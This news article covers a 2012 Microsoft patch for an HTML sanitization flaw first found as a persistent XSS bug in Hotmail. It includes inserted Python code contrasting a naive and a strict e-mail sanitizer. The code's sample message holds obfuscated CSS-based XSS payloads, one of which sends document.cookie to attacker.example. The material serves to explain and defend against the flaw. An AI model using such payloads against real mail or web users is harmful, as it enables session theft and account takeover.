
Recently-Patched HTML Sanitization Flaw Linked to Hotmail XSS Vulnerability

Microsoft Patched XSS Flaw After Google Security Researchers Found It Within Hotmail

The HTML sanitization flaw patched by Microsoft in this month's Patch Tuesday appears to have been discovered originally as a cross-site scripting flaw on Microsoft's Web-based Hotmail email service.

Microsoft patched CVE-2012-2520, which it identified as an HTML sanitization vulnerability affecting several Microsoft Office, communications and server products, in an "Important" bulletin released as part of October's Patch Tuesday. Because the affected applications do not properly sanitize HTML strings, an attacker can read content they are not authorized to see, or take actions on the site while impersonating the logged-on user.

XSS Vulnerabilities in Hotmail

"An elevation of privilege vulnerability exists in the way that HTML strings are sanitized. An attacker who successfully exploited this vulnerability could perform cross-site scripting attacks and run script in the security context of the logged-on user," Microsoft said in the advisory.

Drew Hintz and Andrew Lyons, two members of the Google Security Team, reported a persistent XSS flaw in Microsoft Hotmail in May this year. Microsoft credited the two engineers for the Hotmail flaw on the Security Researcher Acknowledgments page of its Security TechCenter site, and Google identified the persistent XSS flaw as CVE-2012-2520 on its own research page. No CVSS base score has been published for the vulnerability, so its severity cannot be read off a number, but it's worth noting that Microsoft rated the patch fixing the same flaw in several of its products as "Important."

Microsoft did not mention Hotmail at all in the advisory.

"In June 2012 Microsoft became aware of limited, targeted exploits of this issue in Hotmail and addressed the vulnerability immediately; while we addressed the same issue in Microsoft Office and Microsoft Server Software on October 9, we have no evidence of exploitation in the wild,” a Microsoft spokesperson told SecurityWeek.

The targeted attacks relied on a specially crafted HTML email, sent to the recipient's Hotmail address, that carried JavaScript inside CSS. Merely opening the message in Hotmail, with no link to click, would have given the attacker full control over the recipient's emails and account. Hotmail's HTML sanitization should have stripped the JavaScript and rendered the message harmless. Only users reading Hotmail in Internet Explorer 6 or 7 would have been affected, since those browsers, unlike later ones, will execute script embedded in CSS.
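The article shows neither the sanitizer nor the payload, so the following is an added illustration and not Microsoft's code or the payload used against Hotmail. It models the failure mode described above: a filter that strips script tags and on* handlers but trusts style attributes, beside one that first normalizes CSS (comments, hex escapes, embedded whitespace) and then refuses the legacy Internet Explorer 6/7 script-in-CSS features (expression(), behavior:) and javascript: URLs. The sample message, the tag and attribute allowlists and the vector list are all constructed for this example; the exact construct used in the Hotmail attacks was never published.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample message body (not the actual Hotmail payload, which was never
# published). It stands in for the "JavaScript within CSS" vector described above:
# legacy IE 6/7 script-in-CSS features (expression(), behavior:) and a javascript:
# URL inside url(), each obfuscated the way filter-evasion payloads usually are.
SAMPLE_EMAIL = r"""<p style="color: blue">Quarterly report attached.</p>
<div style="width: expr\65 ssion(document.location='http://attacker.example/?c='+document.cookie)">x</div>
<span style="behavior: url(#default#time2)" onbegin="alert(1)">y</span>
<p style="background: url(&quot;java&#115;cript:alert(1)&quot;)">z</p>
<script>alert(1)</script>
"""

_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n\r\f]?|\\(.)", re.S)

# Matched against the *normalized* value, so no whitespace/escape tolerance is needed.
_CSS_SCRIPT_VECTORS = {
    "expression": re.compile(r"expression\("),                 # IE dynamic properties
    "behavior": re.compile(r"behavior:"),                       # IE DHTML behaviours (.htc)
    "-moz-binding": re.compile(r"-moz-binding:"),               # Gecko XBL, same idea
    "script-url": re.compile(r"url\(['\"]?(javascript|vbscript):"),
    "@import": re.compile(r"@import"),                          # pulls in a remote stylesheet
}


def normalize_css(css):
    """Undo the obfuscations used to slip past naive CSS filters: comments that split
    a keyword (exp/**/ression), CSS hex escapes (\\65 is 'e'), and whitespace or
    control characters inserted inside a keyword. Used for the check only; the
    original value is what gets emitted if it passes."""
    css = _CSS_COMMENT.sub("", css)

    def _unescape(m):
        if m.group(1):
            try:
                return chr(int(m.group(1), 16))
            except ValueError:          # code point out of range
                return ""
        return m.group(2)

    css = _CSS_ESCAPE.sub(_unescape, css)
    css = re.sub(r"[\x00-\x20\x7f]", "", css)
    return css.lower()


def find_css_script_vectors(css):
    """Return the names of the script vectors present in a style string."""
    norm = normalize_css(css)
    return [name for name, rx in _CSS_SCRIPT_VECTORS.items() if rx.search(norm)]


def css_has_script(css):
    return bool(find_css_script_vectors(css))


class EmailSanitizer(HTMLParser):
    """Allow-list sanitizer for HTML mail. strict_css=False reproduces the naive
    filter that drops <script> and on* handlers but trusts style attributes."""
    ALLOWED_TAGS = {"p", "div", "span", "b", "i", "a", "br", "table", "tr", "td"}
    ALLOWED_ATTRS = {"style", "href", "title"}   # no on* handler can ever get in

    def __init__(self, strict_css=True):
        super().__init__(convert_charrefs=True)   # entities in attributes are decoded
        self.strict_css = strict_css
        self.out = []
        self._skip_depth = 0    # > 0 while inside <script>/<style>, whose text is dropped

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED_TAGS:
            if tag in ("script", "style"):
                self._skip_depth += 1
            return                      # unknown tag dropped, its text content kept
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in self.ALLOWED_ATTRS:
                continue
            if name == "style" and self.strict_css and css_has_script(value):
                continue                # drop the whole attribute rather than "repair" it
            if name == "href" and not re.match(r"(https?|mailto):", value.strip(), re.I):
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
        elif tag in self.ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self._skip_depth == 0:
            self.out.append(html.escape(data, quote=False))


def sanitize(markup, strict_css=True):
    parser = EmailSanitizer(strict_css)
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print("naive :", sanitize(SAMPLE_EMAIL, strict_css=False))
    print("strict:", sanitize(SAMPLE_EMAIL, strict_css=True))
```

Two design points carry over to any real sanitizer: normalize before you match, because HTML entities, CSS comments and hex escapes each independently defeat a plain substring filter, and drop an offending attribute outright instead of trying to clean it, since a "repaired" value is just another parser-differential to get wrong. A production filter would go further and allow only known-safe CSS properties and value grammars rather than denying known-bad ones.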

While the flaw was fixed in Hotmail right away, Microsoft appears to have then looked for and fixed the same issue in other products, resulting in the MS12-066 bulletin released earlier this week.

Affected software included Microsoft InfoPath 2007 and both 32-bit and 64-bit versions of Microsoft InfoPath 2010, Microsoft Communicator 2007 R2, 32-bit and 64-bit versions of Microsoft Lync 2010, Microsoft Lync 2010 Attendee, 32-bit and 64-bit versions of Microsoft SharePoint Server 2007 and 2010, 32-bit and 64-bit versions of Microsoft Windows SharePoint Services 3.0, Microsoft Groove Server 2010, Microsoft SharePoint Foundation 2010, and Microsoft Office Web Apps 2010.

Microsoft uses a common anti-XSS library across many products, and it was likely this library that contained the sanitization flaw, Bill Pennington, chief strategy officer of WhiteHat Security, told SecurityWeek. Although SharePoint is sold as shrink-wrapped software, it is deployed with a Web-based UI, which exposes the application to XSS attacks. Instant messenger clients often use Internet Explorer's engine to render HTML content. As more administration interfaces move to the Web, more desktop applications acquire an attack surface for XSS issues, Pennington said.

"Anything that uses a browser or HTML rendering components that executes client-side code is potentially vulnerable to XSS attack," Pennington added.

For the applications patched in this Patch Tuesday release, an attacker would have to convince a user to click a link to a specially crafted URL, or send the user a specially crafted chat message, Microsoft said in the advisory.

Fahmida Y. Rashid is a Senior Contributing Writer for SecurityWeek. She has experience writing and reviewing security, core Internet infrastructure, open source, networking, and storage. Before setting out her journalism shingle, she spent nine years as a help-desk technician, software and Web application developer, network administrator, and technology consultant.